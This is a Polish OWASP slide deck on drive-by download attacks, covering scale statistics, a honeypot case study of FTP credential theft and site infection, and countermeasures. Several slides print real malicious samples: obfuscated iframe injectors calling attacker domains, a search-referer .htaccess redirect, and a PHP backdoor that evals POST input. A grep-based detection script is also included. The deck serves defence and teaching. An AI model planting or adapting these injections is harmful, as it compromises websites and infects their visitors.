ataki drive-by download
DESCRIPTION
Filip Palian [email protected]. Ataki drive-by download. Education Project. Rozkład jazdy. Drive-by download – co to takiego? Dlaczego problem istnieje? Kogo dotyczy problem? Skala problemu Z życia wzięte Studium przypadku Dekodowanie Przeciwdziałanie Przyszłość - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/1.jpg)
Copyright 2007 © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
Ataki drive-by download
Filip [email protected]
Education Project
![Page 2: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/2.jpg)
OWASP
Rozkład jazdy
Drive-by download – co to takiego? Dlaczego problem istnieje? Kogo dotyczy problem? Skala problemu Z życia wzięte Studium przypadku Dekodowanie Przeciwdziałanie Przyszłość Co na to OWASP?
![Page 3: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/3.jpg)
OWASP
Drive-by download – co to takiego?
Pobranie z sieci szkodliwego oprogramowania bez zgody i/lub wiedzy użytkownika
![Page 4: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/4.jpg)
OWASP
Dlaczego problem istnieje?
Błędy w przeglądarkach oraz dodatkach Błędy w stronach internetowych
(wstrzyknięcia) Nieświadomość i lenistwo użytkowników Brak (stosowania) odpowiednich zabezpieczeń
Botnety SPAM (D)DoS
![Page 5: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/5.jpg)
OWASP
Dlaczego problem istnieje?
$ Pieniądze
$ Władza
$ Polityka = (pieniądze + władza)
$ Religia = (pieniądze + władza)
![Page 6: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/6.jpg)
OWASP
Kogo głównie dotyczy problem?
Użytkownicy przeglądarek internetowych
Użytkownicy kont FTP + WWW
Twórcy stron internetowych
Firmy hostingowe
![Page 7: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/7.jpg)
OWASP
Skala problemu
http://web.archive.org/web/20080525170526/http://top100.pl/
![Page 8: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/8.jpg)
OWASP
Skala problemu (home.pl)
http://www.google.com/safebrowsing/diagnostic?site=AS:12824
![Page 9: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/9.jpg)
OWASP
Skala problemu (netart.pl)
http://www.google.com/safebrowsing/diagnostic?site=AS:15967
![Page 10: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/10.jpg)
OWASP
Skala problemu (fastpark.net)
http://www.google.com/safebrowsing/diagnostic?site=AS:13727
![Page 11: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/11.jpg)
OWASP
Skala problemu c.d.
GoDaddy (AS26496)
Dreamhost (AS26347)
Akamai (AS20940)
Microsoft (AS8075)
Google (AS15169)
OVH (AS16276)
![Page 12: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/12.jpg)
OWASP
Skala problemu c.d.
Źródło: http://www.cert.pl/PDF/Raport_CP_2009.pdf
![Page 13: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/13.jpg)
OWASP
Z życia wzięte (a.k.a. cyferki++)
Na przykładzie danych zebranych w okresieVIII 2008 – III 2010:
44042 (wykryte) zainfekowane pliki233 (wykryte) domeny70 rodzajów szkodliwego oprogramowania
![Page 14: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/14.jpg)
OWASP
Z życia wzięte c.d.
Paź Lis Gru Sty Lut Mar Kwi maj Cze Lip Sie Wrz Paź Lis Gru Sty Lut Mar
0
2000
4000
6000
8000
10000
12000
0
2000
4000
6000
8000
10000
12000
52 43 25 30269
1904
7223
2061
627
10920
1006
2993
8822
2305
272554
4202
734
Liczba infekcji 2008 - 2010
Miesiąc
Infe
kcje
2008 2009 2010
![Page 15: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/15.jpg)
OWASP
Z życia wzięte c.d.
Kwi 2009: Korea Pn. wystrzeliwuje rakietę Taepodong-2 Trzęsienie ziemi w Meksyku
Lip 2009: Zamachy terrorystyczne na hotele w Dżakarcie Śmierć Michaela Jacksona
Paź 2009: Barack Obama laureatem pokojowej nagrody Nobla
Lut 2010: Igrzyska olimpijskie w Vancouver Trzęsienia ziemi na Haiti i w Chile
![Page 16: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/16.jpg)
OWASP
Z życia wzięte c.d.
Źródło: http://cert.gov.pl/portal/cer/8/298/Cyberprzestepcy_wykorzystuja_tragedie_narodowa_aktualizacja.html
![Page 17: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/17.jpg)
OWASP
Z życia wzięte c.d.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44
0
2000
4000
6000
8000
10000
12000
108 116 127 128 133 144 145 152 158 170 172 180 181 212 224 224 231 237 256 262 271 289 302 318 332 353 415 440 511 605 650 671 692 712 7901035 1101 1102
1996 2079 2081
3952
7131
9619
Liczba infekcji plików domeny
Domena
Lic
zba
infe
kcji
![Page 18: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/18.jpg)
OWASP
Studium przypadku
1. Ofiara odwiedza zainfekowaną stronę WWW
2. Malware na stronie wykorzystuje błąd w oprogramowaniu
3. Kradzież danych dostępowych do konta FTP
4. Zalogowanie się na konto FTP i pobranie plików
5. Dodanie szkodliwej treści do pobranych plików
6. Wgranie na serwer FTP zainfekowanych plików
![Page 19: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/19.jpg)
OWASP
Studium przypadku c.d.
Środowisko testowe honeypota:
VMware MS Windows XP Professional SP2 Systemowy firewall AVG 8 Adobe Reader 9.x MS Internet Explorer 6.x Capture HPC (The Honeynet Project)
![Page 20: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/20.jpg)
OWASP
Studium przypadku c.d.
1. Ofiara odwiedza zainfekowaną stronę.
Gdzie takie znaleźć?
http://www.google.com/safebrowsing/diagnostic?site=
http://stopbadware.org/reports/ip
http://stopbadware.org/reports/asn
http://www.malwaredomainlist.com/mdl.php
Co się dzieje na tym etapie?
![Page 21: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/21.jpg)
OWASP
Studium przypadku c.d.
![Page 22: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/22.jpg)
OWASP
Studium przypadku c.d.
2. Malware na stronie wykorzystuje błędy w oprogramowaniu
Przeglądarki (głównie IE, FX, Opera)
Wtyczki (Adobe Reader, RealPlayer, ActiveX etc.)
Silniki skryptowe (np. SeaMonkey, JScript, Rhino)
No dobrze, i co dalej?
![Page 23: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/23.jpg)
OWASP
Studium przypadku c.d.
![Page 24: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/24.jpg)
OWASP
Studium przypadku c.d.
![Page 25: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/25.jpg)
OWASP
Studium przypadku c.d.
![Page 26: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/26.jpg)
OWASP
Studium przypadku c.d.
![Page 27: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/27.jpg)
OWASP
Studium przypadku c.d.
Efekt?
![Page 28: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/28.jpg)
OWASP
Studium przypadku c.d.
Co nas uderzyło?Trojan FakeRean
Co robi ten trojan?Win32/FakeRean podszywa się pod oprogramowanie antywirusowe i wyświetlanieprawdziwe informacje o zainfekowanych plikach w systemie. Następnie informujeużytkownika o tym, że musi on zapłacić za usunięcie zagrożeń, które nie istnieją.
Gdzie znajdę więcej informacji?http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32%2fFakeRean
![Page 29: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/29.jpg)
OWASP
Studium przypadku c.d.
3. Kradzież danych dostępowych do konta FTP (i nie tylko)
Sniffery
Keyloggery
Serwery proxy
Zapamiętywanie haseł w aplikacjach
![Page 30: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/30.jpg)
OWASP
Studium przypadku c.d.
4. Zalogowanie się na konto FTP i pobranie plików
Jan 9 16:51:00 foo pure-ftpd: ([email protected]) [INFO] New connection from x.x.x.xJan 9 16:51:00 foo pure-ftpd: ([email protected]) [INFO] ftpuser is now logged inJan 9 16:51:01 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/index.html downloadedJan 9 16:51:01 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/index.php downloadedJan 9 16:51:01 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/bar/index.html downloadedJan 9 16:51:02 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/tmp/index.htm downloaded(...)Jan 9 16:51:03 foo pure-ftpd: ([email protected]) [INFO] Logout.
![Page 31: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/31.jpg)
OWASP
Studium przypadku c.d.
5. Dodanie szkodliwej treści do pobranych plików
Przed “<html>”
W “<body>”
Po “</html>”
Gdziekolwiek ucinając resztę zawartości pliku
![Page 32: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/32.jpg)
OWASP
Studium przypadku c.d.
5. Dodanie szkodliwej treści do pobranych plików
$ tail -4 index.html</BODY></HTML><!-- ad --><script>.12312313,1313123+13123.31313,d=(("sdfsfd"?(.45,(.33?("wi"+("re","n")):("dfg",.44,d=5))):(.4,"sdf"))),e=(g="5",(.44,.0,"d"+(.33,(.4?(45./.343,"ow"):("34","34"))))),f=("poc"?(.0?.0:"d"+("43",.3,"oc")):"333"),u=(33?("u"+("z",44.,"m")):33)+("e"+(1,1,5,(.3,"n")+("d","t")));y=(a=(444444444444444444444444,55555555,"rrrrrrrrrrrr","e"),b=(.5?"v":("d"?"f":"tt")),c=("33"?(.33/44.,.33,33.,.33,"a"):"z"),g=(("f"),(333/444.,"l")));(ee=eval(a+(55/(...)("E","e")))+(("a","r")+("woman","man"))+("ad"+("re","ve"))+"rt"+("his",("is"?"is":"a "+"man"))+"i"+("S","ng")+(".a",".n")+"et"+("/s","/i")+"n.c"+"gi"+("!!!","?")+("A","3","2")+"&' "+("si","wi")+"d"+"th="+("1","3")+"0 he"+("sig","i"+"g")+"ht=2"+((0,"0")+" s"+("vy","ty"))+"le='v"+("asi",("as","is")+"i")+("b"+(33?"il":"aa"))+"ity:"+("bi","hi")+"dd"+("de","en")+"'></i"+"fr"+("na"+("you","me"),"a"+("me"?"me":"you"))+">");}var ahsd78asdas6dyasdiashdiayd=true;</script><!-- /ad --><iframe src="http://homenameworld.cn:8080/ts/in.cgi?pepsi21"width=12 height=12 style="visibility: hidden"></iframe><iframe src="http://nakulpi.net/?click=457956" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
![Page 33: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/33.jpg)
OWASP
Studium przypadku c.d.
6. Wgranie na serwer FTP zainfekowanych plików
Jan 9 16:52:00 foo pure-ftpd: ([email protected]) [INFO] New connection from x.x.x.xJan 9 16:52:00 foo pure-ftpd: ([email protected]) [INFO] ftpuser is now logged inJan 9 16:52:01 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/.htaccess uploadedJan 9 16:52:01 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/index.html uploadedJan 9 16:52:01 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/index.php uploadedJan 9 16:52:01 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/bar/.htaccess uploadedJan 9 16:52:01 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/bar/index.html uploadedJan 9 16:52:02 foo pure-ftpd: ([email protected]) [NOTICE] /srv/www/foo/tmp/jquery.js uploaded(...)Jan 9 16:52:03 foo pure-ftpd: ([email protected]) [INFO] Logout.
![Page 34: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/34.jpg)
OWASP
Studium przypadku c.d.
6. Wgranie na serwer FTP zainfekowanych plików
$ cat .htaccessRewriteEngine OnRewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]RewriteRule .* http://x.x.x.x/in.html?s=xx [R,L]
![Page 35: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/35.jpg)
OWASP
Przykłady szkodliwego oprogramowania
1)<iframe src="http://porno-cmc.ru/?partner=1354" width=2 height=2 style="visibility:hidden"></iframe>
2)<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1height=1></iframe>'; ?>
3)<script>/*GNU GPL*/ try{window.onload = function(){var Z6kdr96vryd = document.createElement('s!^(@c&!r)#@i^#p@(@t!!$'.replace(/\$|&|\!|\^|#|@|\)|\(/ig, ''));Z6kdr96vryd.setAttribute('type','text/javascript');Z6kdr96vryd.setAttribute('src', 'h^^$t$(^^)t@p((:$$/(&(/&y#e(s!&^!k)y&^#-!c$)$o^m^!(@$.&)n$a!))!u$)k)^$r($i!)&&.#@&c(o#$@m!^.($(t^h@@e^p#@i&@r&a&$t))$^)e!((b@a@)!&y(@^-@&^#o$&^((r)!)g@&(.#^v!@!@i#^e#&$$w@^^h!!$@)o&m@e@s$)a#$!l^e!^.@r&)u$(:&)8)0!)8()@0)/##c$l$!@(i#c#)k)^!s(o$(#r!@^@&.#!)c@&o^@m!##)/#^!!c!$($l#($i)&c@$&k^^(s!&o!^!&r#!(.)c^^)o&#m&#$/#&^g)u#$$)a#r!&)&&d^^i#)a@!n#$^.#c$@$o$.!^!@u(k(()/)#!g#^!o^^!o!!^g!l)!e&.)c!@o#)m^/&f##&(i$(^l)(e&#h!i#@p&p^)o(.!^@^c&)&o@(!m!))$/^)'.replace(/\(|\!|\$|\^|\)|#|&|@/ig, ''));Z6kdr96vryd.setAttribute('defer', 'defer');Z6kdr96vryd.setAttribute('id', 'Q((4^f!#3)#z@#5^)!s!&!f)$^9@2^o$)x@#@$)'.replace(/\$|\)|@|#|\!|&|\(|\^/ig, ''));document.body.appendChild(Z6kdr96vryd);}} catch(e) {}</script>
![Page 36: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/36.jpg)
OWASP
Przykłady szkodliwego oprogramowania c.d.
5)<!-- o --><script language='JavaScript'>function nbsp() {vart,o,l,i,j;vars='';s+='060047116101120116097116101097062060047116101120116097114101097062';s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';s=s+'110105046099111109047098095116114047105110100101120046112104112034032119105100116104061051032104101';s=s+'105103104116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082';s=s+'065077069062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c →
6)<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LnDyaXRlKHVuZXNjYXBlKCdkT3ElM0NzY3JpOWdwRWEydE44SiUyMHNPa3JjRWEyJTNET2slMkYlMkY5Zzk0JTJFMERCMjBEQjRFYTI3JTJFMiUyRTlnMTk1T2slMkZqcW9nMnVOOEplRWEycjEweU9rJTJFMERCanMwREIlM0UlM0NPayUyRnNjcmlwdCUzRScpLnJlcGxhY2UoL044Snw5Z3xFYTJ8MERCfGRPcXxvZzJ8MTB8T2svZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://cutlot.cn/in.cgi?income51" width=1 height=1style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
![Page 37: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/37.jpg)
OWASP
Dekodowanie (na szybko ;-p)
noScript i alert() prawdę Ci powiedzą.
![Page 38: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/38.jpg)
OWASP
Dekodowanie c.d.
noScript:
![Page 39: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/39.jpg)
OWASP
Dekodowanie c.d.
alert() na przykładzie Exploit.HTML.IESlice.h:
Przed:<script>document.write(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%7A%58%28%73%29%0D%0A%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%20%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%0D%0A%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%20%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%20%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%20%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));zX('%2A8Hxhwnuy%2A75qfslzflj%2A8IOf%7BfXhwnuy%2A8Jkzshynts%2A75ih%2A7%3D%7D%2A7%3E%2A%3CG%7Bfw%2A75q%2A8I');</script>
Po:<script>alert(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%7A%58%28%73%29%0D%0A%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%20%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%0D%0A%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%20%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%20%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%20%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));zX('%2A8Hxhwnuy%2A75qfslzflj%2A8IOf%7BfXhwnuy%2A8Jkzshynts%2A75ih%2A7%3D%7D%2A7%3E%2A%3CG%7Bfw%2A75q%2A8I');</script>
![Page 40: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/40.jpg)
OWASP
Dekodowanie c.d.
alert():
![Page 41: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/41.jpg)
OWASP
Przeciwdziałanie
Jak można się bronić o ile w ogóle?
W kontekście:
Badaczy Po stronie serwera Po stronie klienta
![Page 42: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/42.jpg)
OWASP
Przeciwdziałanie (research)
Narzędzia do analizy szkodliwego oprogramowania:
http://stopbadware.comhttp://unmaskparasites.comhttp://malzilla.sourceforge.net/index.htmlhttp://wepawet.iseclab.orghttp://virustotal.com (hispasec)http://virusscan.jotti.orghttp://anubis.iseclab.orghttp://badwarebusters.org/community/submithttp://www.secureworks.com/research/tools/caffeinemonkey.htmlhttp://www.google.com/safebrowsing/report_badware/...
![Page 43: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/43.jpg)
OWASP
Przeciwdziałanie (research) c.d.
Zalety: Wysoki stopień wykrywalości szkodliwego oprogramowania
Wady: W większości są to rozwiązania on-line i/lub
wymagające interakcji użytkownika
Stosunkowo długi czas analizy plików
![Page 44: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/44.jpg)
OWASP
Przeciwdziałanie (serwer)
Dostępne rozwiązania:
ProFTPD + mod_exec
Pure-FTPd + uploadscript
Firewalle aplikacyjne (WAF-y)
Systemy IDS/IPS
Antywirusy
![Page 45: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/45.jpg)
OWASP
Przeciwdziałanie (serwer) c.d.
Zalety: Możliwość implementacji własnego rozwiązania z FTPD
Blokada “wstrzyknięć” przez WAF-y
Wady: WAF-y nie posiadają sygnatur dla szkodliwego oprogramowania
Antywirusy słabo rozpoznają szkodliwe oprogramowanie
Systemy IDS/IPS nie posiadają sygnatur dla szkodl. oprogr.
Brak możliwości zabronienia wgrania na serwer zainfekowanych plików
![Page 46: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/46.jpg)
OWASP
Przeciwdziałanie (serwer) c.d.
Przykład własnego rozwiązania opartego na:
Pure-FTPd + uploadscript + skrypt bash
Gdyby ktoś był ciekaw...
Rozwiązanie stabilne, sprawdzone w środowisku produkcyjnym(serwer i ~2000 klientów) z liczbą false positive bliską “/dev/zero”.
![Page 47: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/47.jpg)
OWASP
Przeciwdziałanie (serwer) c.d.
-- cut --# "THE BEER-WARE LICENSE":# <[email protected]> wrote this file. As long as you retain this# notice you can do whatever you want with this stuff. If we meet some day,# and you think this stuff is worth it, you can buy me a beer in return Filip Palian....# Finds: "foo.(cn|ru|ro)" with iframeegrep -i "*[[:print:]]\.(cn|ru|ro)" "$1" | egrep "[[:print:]]<iframe>[[:print:]]" 1>/dev/null;if [ $? -eq 0 ]; then boo "foo.(cn|ru|ro) with iframe"; exit;fi
# Finds: "function F00(B4R)"egrep -i "function [[:alnum:]]{14,}\([[:alnum:]]{14,}\)" "$1" 1>/dev/null;if [ $? -eq 0 ]; then boo "function F00(B4R)"; exit;Fi…# Finds: everything else what's in /etc/mwdb.txtfor i in `cat $MWDB`; do grep "$i" "$1" 1>/dev/null; if [ $? -eq 0 ]; then boo "/etc/mwdb.txt"; break; fidone-- cut --
![Page 48: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/48.jpg)
OWASP
Przeciwdziałanie (serwer) c.d.
Zalety: Wysoki stopień wykrywalości szkodliwego oprogramowania
Wady: Stworzenie nowej sygnatury poprzedza infekcja
Brak możliwości zabronienia wgrania na serwerzainfekowanych plików
Utrzymanie i rozwijanie rozwiązania wymagaczasu i środków
![Page 49: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/49.jpg)
OWASP
Przeciwdziałanie (klient)
Antywirusy?
Źródło: http://www.virustotal.com/pl/analisis/f6f3ebbbd571d208b6941fe811a55b14d447cd94e1e3c0fbc5fec4a7f2d64975-1269855787
Należy korzystać z antywirusów!
![Page 50: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/50.jpg)
OWASP
Przeciwdziałanie (klient) c.d.
Zalety: Dobry zaktualizowany antywirus być może nas ochroni
Wady: Stosunkowo słaba wykrywalność szkodliwego oprogr.
Potrzeba codziennej aktualizacji bazy sygnatur
Duże prawdopodobieństwo, że dobry zaktualizowanyantywirus nie wykryje zagrożenia
![Page 51: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/51.jpg)
OWASP
Przeciwdziałanie (klient) c.d.
Przeglądarki internetowe:
Zainstalowanie dodatku “NoScript” dla FX!
Wyłączenie zbędnych opcji i pluginów, np.:
Cookies (whitelisting) Java ( Kurnik;-( ) JavaScript (whitelisting) Adobe Reader (pobrać, przeskanować, otworzyć) RealPlayer
Aktualizacja oprogramowania!
![Page 52: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/52.jpg)
OWASP
Przeciwdziałanie (klient) c.d.
Zalety: Znaczne zwiększenie bezpieczeństwa
Wady: Nieco utrudnione korzystanie z przeglądarki (przyzwyczajenie!)
![Page 53: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/53.jpg)
OWASP
Przyszłość
Identyfikacja szkodliwego oprogramowania jeszcze trudniejszaprzez podszywanie się pod np.:
Packery
Staty
Optymalizatory (IonCube, Encode, itp.)
![Page 54: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/54.jpg)
OWASP
Przyszłość c.d.
Packer:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.4("<0%5%6%7%2%1=\\"8://%1%9%0%a%b%0%c%1%d%e%f%2\\" g=\\"h:i\\">");',19,19,'69|65|6d|document|write|66|72|61|http|76|6c|73|74|2e|63|6f|style|visibility|none'.split('|'),0,{}))
Staty:
<!-- (C) stat666 / Main page --><script type="text/javascript"><!--document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://s1.hit.stat666.com/_'+(new Date()).getTime()+'/script.js?id=1234567890"></'+'scr'+'ipt>');//--></script>
